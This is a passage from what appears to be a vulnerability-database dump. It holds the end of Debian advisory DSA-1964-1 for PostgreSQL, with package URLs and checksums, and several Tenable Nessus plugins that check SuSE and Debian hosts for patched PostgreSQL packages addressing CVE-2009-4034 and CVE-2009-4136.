http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.9-0lenny1_s390.deb\n Size/MD5 checksum: 266584 d0b04bf60cde3f40c9fce955c2605f86\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-compat3_8.3.9-0lenny1_s390.deb\n Size/MD5 checksum: 255670 1ec45e7d6da21ba19e4d60c75c0d772f\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.9-0lenny1_s390.deb\n Size/MD5 checksum: 5749542 5580df4bb5795150ac7857d7ba7ae42c\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.9-0lenny1_sparc.deb\n Size/MD5 checksum: 266478 a7bea0b395e3d76fb8955b9c88930c32\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.9-0lenny1_sparc.deb\n Size/MD5 checksum: 5443482 b2f6fb9ef28a6546bfb16edb04174587\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq5_8.3.9-0lenny1_sparc.deb\n Size/MD5 checksum: 374030 93fd40c89f1e9514eae1ad82e3e8b1de\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-dev_8.3.9-0lenny1_sparc.deb\n Size/MD5 checksum: 447618 977c4a2bdaf20acd216168af8565ab8b\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-compat3_8.3.9-0lenny1_sparc.deb\n Size/MD5 checksum: 254358 03036816dbcae5e65f83d43f14c38248\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpgtypes3_8.3.9-0lenny1_sparc.deb\n Size/MD5 checksum: 273542 d2209b4a6aaa5d080b806c071d10b158\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.9-0lenny1_sparc.deb\n Size/MD5 checksum: 265224 58500b63942c05de0669bb65672b4b8d\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq-dev_8.3.9-0lenny1_sparc.deb\n Size/MD5 checksum: 440782 4027e1c4ce92d74f2a8fd6940c961db1\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client-8.3_8.3.9-0lenny1_sparc.deb\n Size/MD5 checksum: 1651946 b6c48822ca1f4ba96db475dc57c17517\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.9-0lenny1_sparc.deb\n Size/MD5 checksum: 272206 5fb169da135b3f58f3c3c9e3478916a9\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.9-0lenny1_sparc.deb\n Size/MD5 checksum: 819770 4944e6d2bd66050c967a2f35b268c600\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg6_8.3.9-0lenny1_sparc.deb\n Size/MD5 checksum: 273798 c312e645cbcad0bd289baf2c72296f83\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.9-0lenny1_sparc.deb\n Size/MD5 checksum: 570650 26bbe28936b26f0190327c934a0d32b4\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2009-12-31T16:38:59", "published": "2009-12-31T16:38:59", "id": "DEBIAN:DSA-1964-1:7EE9B", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00289.html", "title": "[SECURITY] [DSA-1964-1] New PostgreSQL packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-02-21T01:13:56", "bulletinFamily": "scanner", "description": "The following bugs have been fixed :\n\nAn unprivileged, authenticated PostgreSQL user could create a table which references functions with malicious content. Maintenance operations carried out be the database superuser could execute such functions. (CVE-2009-4136)\n\nEmbedded null bytes in the common name of SSL certificates could bypass certificate hostname checks. (CVE-2009-4034)\n\nPostgreSQL was updated to the next upstream patchlevel update which also includes several bugfixes. See the package changelog for details.", "modified": "2012-05-17T00:00:00", "id": "SUSE_POSTGRESQL-6768.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=49920", "published": "2010-10-11T00:00:00", "title": "SuSE 10 Security Update : PostgreSQL (ZYPP Patch Number 6768)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(49920);\n script_version (\"$Revision: 1.5 $\");\n script_cvs_date(\"$Date: 2012/05/17 11:20:15 $\");\n\n script_cve_id(\"CVE-2009-4034\", \"CVE-2009-4136\");\n\n script_name(english:\"SuSE 10 Security Update : PostgreSQL (ZYPP Patch Number 6768)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The following bugs have been fixed :\n\nAn unprivileged, authenticated PostgreSQL user could create a table\nwhich references functions with malicious content. Maintenance\noperations carried out be the database superuser could execute such\nfunctions. (CVE-2009-4136)\n\nEmbedded null bytes in the common name of SSL certificates\ncould bypass certificate hostname checks. (CVE-2009-4034)\n\nPostgreSQL was updated to the next upstream patchlevel update which\nalso includes several bugfixes. See the package changelog for details.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4034.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4136.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6768.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2012 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"postgresql-devel-8.1.19-0.4.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"postgresql-libs-8.1.19-0.4.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"postgresql-libs-32bit-8.1.19-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"postgresql-8.1.19-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"postgresql-contrib-8.1.19-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"postgresql-devel-8.1.19-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"postgresql-docs-8.1.19-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"postgresql-libs-8.1.19-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"postgresql-pl-8.1.19-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"postgresql-server-8.1.19-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"postgresql-libs-32bit-8.1.19-0.4.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:14:40", "bulletinFamily": "scanner", "description": "The following bugs have been fixed :\n\n - An unprivileged, authenticated PostgreSQL user could create a table which references functions with malicious content. Maintenance operations carried out be the database superuser could execute such functions.\n (CVE-2009-4136)\n\n - Embedded null bytes in the common name of SSL certificates could bypass certificate hostname checks.\n (CVE-2009-4034)\n\nPostgreSQL was updated to the next upstream patchlevel update which also includes several bugfixes. See the package changelog for details.", "modified": "2013-10-25T00:00:00", "id": "SUSE_11_POSTGRESQL-100111.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=52689", "published": "2011-03-17T00:00:00", "title": "SuSE 11 Security Update : PostgreSQL (SAT Patch Number 1766)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(52689);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2013/10/25 23:52:02 $\");\n\n script_cve_id(\"CVE-2009-4034\", \"CVE-2009-4136\");\n\n script_name(english:\"SuSE 11 Security Update : PostgreSQL (SAT Patch Number 1766)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The following bugs have been fixed :\n\n - An unprivileged, authenticated PostgreSQL user could\n create a table which references functions with malicious\n content. Maintenance operations carried out be the\n database superuser could execute such functions.\n (CVE-2009-4136)\n\n - Embedded null bytes in the common name of SSL\n certificates could bypass certificate hostname checks.\n (CVE-2009-4034)\n\nPostgreSQL was updated to the next upstream patchlevel update which\nalso includes several bugfixes. See the package changelog for details.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=564360\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=564710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4034.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4136.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 1766.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:postgresql-contrib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:postgresql-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:postgresql-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:postgresql-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:postgresql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/03/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2013 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"postgresql-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"postgresql-contrib-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"postgresql-docs-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"postgresql-libs-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"postgresql-libs-32bit-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"postgresql-server-8.3.9-0.1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:12:59", "bulletinFamily": "scanner", "description": "The following bugs have been fixed :\n\n - An unprivileged, authenticated PostgreSQL user could create a table which references functions with malicious content. Maintenance operations carried out be the database superuser could execute such functions.\n (CVE-2009-4136)\n\n - Embedded null bytes in the common name of SSL certificates could bypass certificate hostname checks.\n (CVE-2009-4034)\n\nPostgreSQL was updated to the next upstream patchlevel update which also includes several bugfixes. See the package changelog for details.", "modified": "2013-10-25T00:00:00", "id": "SUSE_11_POSTGRESQL-100108.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44055", "published": "2010-01-19T00:00:00", "title": "SuSE 11 Security Update : PostgreSQL (SAT Patch Number 1766)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44055);\n script_version(\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2013/10/25 23:52:02 $\");\n\n script_cve_id(\"CVE-2009-4034\", \"CVE-2009-4136\");\n\n script_name(english:\"SuSE 11 Security Update : PostgreSQL (SAT Patch Number 1766)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The following bugs have been fixed :\n\n - An unprivileged, authenticated PostgreSQL user could\n create a table which references functions with malicious\n content. Maintenance operations carried out be the\n database superuser could execute such functions.\n (CVE-2009-4136)\n\n - Embedded null bytes in the common name of SSL\n certificates could bypass certificate hostname checks.\n (CVE-2009-4034)\n\nPostgreSQL was updated to the next upstream patchlevel update which\nalso includes several bugfixes. See the package changelog for details.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=564360\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=564710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4034.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4136.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 1766.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:postgresql-contrib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:postgresql-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:postgresql-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:postgresql-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:postgresql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2013 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"postgresql-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"postgresql-libs-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"postgresql-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"postgresql-libs-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"postgresql-libs-32bit-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"i586\", reference:\"postgresql-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"i586\", reference:\"postgresql-contrib-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"i586\", reference:\"postgresql-docs-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"i586\", reference:\"postgresql-libs-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"i586\", reference:\"postgresql-server-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"postgresql-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"postgresql-contrib-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"postgresql-docs-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"postgresql-libs-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"postgresql-libs-32bit-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"postgresql-server-8.3.9-0.1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:13:06", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in PostgreSQL, a database server. The Common Vulnerabilities and Exposures project identifies the following problems :\n\nIt was discovered that PostgreSQL did not properly verify the Common Name attribute in X.509 certificates, enabling attackers to bypass the (optional) TLS protection on client-server connections, by relying on a certificate from a trusted CA which contains an embedded NUL byte in the Common Name (CVE-2009-4034 ).\n\nAuthenticated database users could elevate their privileges by creating specially crafted index functions (CVE-2009-4136 ).\n\nThe following matrix shows fixed source package versions for the respective distributions.\n\n oldstable/etch stable/lenny testing/unstable postgresql-7.4 7.4.27-0etch1 postgresql-8.1 8.1.19-0etch1 postgresql-8.3 8.3.9-0lenny1 8.3.9-1 postgresql-8.4 8.4.2-1 In addition to these security fixes, the updates contain reliability improvements and fix other defects.", "modified": "2018-11-10T00:00:00", "id": "DEBIAN_DSA-1964.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44829", "published": "2010-02-24T00:00:00", "title": "Debian DSA-1964-1 : postgresql-7.4, postgresql-8.1, postgresql-8.3 - several vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1964. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44829);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/11/10 11:49:34\");\n\n script_cve_id(\"CVE-2009-4034\", \"CVE-2009-4136\");\n script_bugtraq_id(37333, 37334);\n script_xref(name:\"DSA\", value:\"1964\");\n\n script_name(english:\"Debian DSA-1964-1 : postgresql-7.4, postgresql-8.1, postgresql-8.3 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in PostgreSQL, a database\nserver. The Common Vulnerabilities and Exposures project identifies\nthe following problems :\n\nIt was discovered that PostgreSQL did not properly verify the Common\nName attribute in X.509 certificates, enabling attackers to bypass the\n(optional) TLS protection on client-server connections, by relying on\na certificate from a trusted CA which contains an embedded NUL byte in\nthe Common Name (CVE-2009-4034 ).\n\nAuthenticated database users could elevate their privileges by\ncreating specially crafted index functions (CVE-2009-4136 ).\n\nThe following matrix shows fixed source package versions for the\nrespective distributions.\n\n oldstable/etch stable/lenny testing/unstable \n postgresql-7.4 7.4.27-0etch1 \n postgresql-8.1 8.1.19-0etch1 \n postgresql-8.3 8.3.9-0lenny1 8.3.9-1 \n postgresql-8.4 8.4.2-1 \nIn addition to these security fixes, the updates contain reliability\nimprovements and fix other defects.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-4034\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-4136\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1964\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the PostgreSQL packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:postgresql-7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:postgresql-8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:postgresql-8.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"libecpg-compat2\", reference:\"8.1.19-0etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libecpg-dev\", reference:\"8.1.19-0etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libecpg5\", reference:\"8.1.19-0etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libpgtypes2\", reference:\"8.1.19-0etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libpq-dev\", reference:\"8.1.19-0etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libpq4\", reference:\"8.1.19-0etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"postgresql-7.4\", reference:\"7.4.27-0etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"postgresql-8.1\", reference:\"8.1.19-0etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"postgresql-client-7.4\", reference:\"7.4.27-0etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"postgresql-client-8.1\", reference:\"8.1.19-0etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"postgresql-contrib-7.4\", reference:\"7.4.27-0etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"postgresql-contrib-8.1\", reference:\"8.1.19-0etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"postgresql-doc-7.4\", reference:\"7.4.27-0etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"postgresql-doc-8.1\", reference:\"8.1.19-0etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"postgresql-plperl-7.4\", reference:\"7.4.27-0etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"postgresql-plperl-8.1\", reference:\"8.1.19-0etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"postgresql-plpython-7.4\", reference:\"7.4.27-0etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"postgresql-plpython-8.1\", reference:\"8.1.19-0etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"postgresql-pltcl-7.4\", reference:\"7.4.27-0etch1\")) flag++;\nif 